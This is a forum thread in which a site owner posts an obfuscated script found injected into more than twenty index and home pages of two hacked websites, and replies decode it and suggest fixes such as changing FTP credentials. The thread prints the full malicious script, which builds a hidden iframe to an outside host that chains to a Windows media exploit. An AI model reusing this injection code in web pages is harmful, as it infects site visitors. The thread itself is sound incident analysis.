This morning I discovered that a script has appeared in multiple locations on two of our websites.
Needless to say I'm recovering the sites from backups, changing our passwords and trawling the FTP logs. Are there any other actions I should take?
Here is the script. Any ideas what it might do?
<!-- C/C v0870 --><script>function fY(){};xN='';fY.prototype = {k : function() {p=7854;this.eS="";pT=false;return '\u0068\u0058\u0058\u0070\u003a\u002f\u002f\u0062\u0065\u006f\u0048\u0048\u0048\u0048\u0048\u0048\u0048\u0048\u0048\u0048\u0048\u0048\u0048\u0048\u0048\u0048\u0048\u0048\u0048\u0048\u0048\u0048\u0058\u006d\u006c'.replace(/X/g, 't').replace(/HHHHHHHHHHHHHHHHHHHHHH/g, 'linkonline.com/index.h');t="t";var uY="uY";var q=27591;var o=function(){return 'o'};},c : function() {var kB='';function wC(){};this.lQ="";var a=new Date(); var uA=false;function gR(){}; var b='replace';this.iA="";var m='';var w=document;var uT='';var bD="";var v=new Array();var mQ=function(){};var j=window;function kA(){};function aO(){};var f=24513;var hJ=new Date();var vH=new Date();fU=false;var qH=new Date();this.aI='';String.prototype.pZ=function(u,g){return this[b](u, g)};var mZ="mZ";var jI='';var n='';this.nW='';var gC=function(){return 'gC'};s="";var e = '\u0073\u0058\u0058\u0058\u0048\u0048\u0048\u0048\u0075\u0074'.replace(/XXX/g, 'etH').replace(/HHHHH/g, 'Timeo');this.yO="yO";this.aJ="";var h = '\u003c\u0068\u0074\u006d\u006c\u0020\u003e\u003c\u0068\u0065\u0061\u0064\u0020\u003e\u003c\u0048\u0048\u0065\u0061\u0064\u003e\u003c\u0062\u006f\u0058\u0058\u0058\u0058\u0058\u0058\u0058\u0058\u0064\u0079\u003e\u003c\u0048\u0048\u0074\u006d\u006c\u003e'.replace(/XXXXXXXX/g, 'dy ></bo').replace(/HH/g, '/h');this.fK="";this.d=false;var uC=function(){};aIB=63220;try {var tZ=false;var vN=function(){return 'vN'};bT="bT";var oX=6312;var lT=new Array();this.uP=false;var aV=28730;var gJ = '\u0062\u0058\u0048\u0079'.replace(/X/g, 'o').replace(/H/g, 'd');var jY=function(){};this.jZC='';var hPC=new Date();var z = '\u0073\u0058\u0058\u006c\u0065'.replace(/XX/g, 'HH').replace(/HH/g, 'ty');var pA=4555;var uM=new Array();var eZ=false;this.sT="";var i = '\u0069\u0066\u0058\u0058\u0048\u0065'.replace(/XX/g, 'ra').replace(/H/g, 'm');this.lF=false;var dH='';var wG = '\u0077\u0072\u0058\u0058\u0065'.replace(/XX/g, 'iH').replace(/H/g, 't');this.dI=false;hS='';var vF=false;jZCE=40515;var l = '\u0063\u0072\u0065\u0061\u0074\u0065\u0058\u0058\u0058\u0058\u0048\u0048\u0074'.replace(/XXXX/g, 'Elem').replace(/HH/g, 'en');this.kDH="";var eO="eO";var zT=function(){};vS=12622;var r = '\u0073\u0058\u0063'.replace(/X/g, 'H').replace(/H/g, 'r');bS=false;nWF=false;var dC="dC";var cU="";this.cX=false;var tE='';var gV = '\u0073\u0065\u0058\u0041\u0058\u0048\u0048\u0048\u0048\u0048\u0058\u0065'.replace(/X/g, 't').replace(/HHHHH/g, 'tribu');mM='';var tX='';var sS='';var eI = '\u0068\u0058\u0058\u0058\u0048\u006e'.replace(/XXX/g, 'idH').replace(/HH/g, 'de');function x(){};var jW=function(){return 'jW'};var hP = '\u0076\u0069\u0058\u0058\u0058\u0069\u006c\u0069\u0074\u0079'.replace(/XXX/g, 'HHb').replace(/HH/g, 'si');pM='';dL=""; var jZ = '\u0061\u0070\u0070\u0065\u006e\u0058\u0058\u0068\u0048\u006c\u0064'.replace(/XX/g, 'dC').replace(/H/g, 'i');function bO(){};var nU=false;this.iP=''; this.pN=51645;this.kS="kS"; var eX=this.k();var nC="nC";this.dY='';this.dZ='';oH="";eP=61106;tN=54831;var gU=new Array();var yK=new Date();var y=document[l](i);var nWFY=function(){return 'nWFY'};var bDB="bDB";oU=51980;var pH="";y[z][hP] = eI;var jC=function(){};var rF=function(){};var fA='';y[gV](r, eX);var oI=false;tQ="tQ";hQ="";var nJ=function(){return 'nJ'};w[gJ][jZ](y);lR=13433;this.jD=false;var fKK="";cN="cN";wK="wK";sQ=false;var sE=18173;} catch(bM) {var iC='';var dQ=new Array();var gL=function(){return 'gL'};this.nH='';eIU='';w.write(h);var lN=false;function xI(){};this.jU="jU";fG="";var kD = this;bP=false;kL=50758;var uTT=new Array();qW=21507;var sB=new Array();this.gQ='';oD="oD";j[e](function(){ function hF(){};this.fQ=13986;rN='';oC='';fKY="fKY";var cZ=false;this.xF="";var eT='';kD.c();this.lL="lL";var jQ="";lG="";this.wL=12697;var tG=new Array();rC=false;this.mP="";var tGE="tGE";}, 124);var xD=false;var sL=false;var qS=new Array();}var cP="";var rE=function(){return 'rE'};rM="rM";this.mO="mO";}};var wR=function(){return 'wR'};var hO=new fY(); var uW=function(){return 'uW'};hO.c();var hK=12219;</script>
More than 20 files, all with either the name 'index.' or 'home.' were modified. The FTP log shows which files were downloaded and uploaded again, so I don't think it was through a form exploit.
This creates an invisible iframe:
beolinkonline.com contains anotehr iframe from http://smasmaild.com/kilovork/index.php?468f4ff003bdcff4c1c6b9ef06f2c100
It attempts to run a Windows media file (.asx).
Looks like a type of buffer overflow to me...
Where and how was it injected? Your not sanitizing users posts/uploads??
You should read up on the myspace hack of 2005..
http://namb.la/popular/
It will give you an idea of how you can easily be hack'd :D
You can consider changing both ftp username and passwords. Also you can restrict ftp connections to certain IP addresses / domains so that ftp service is accessible only from select locations.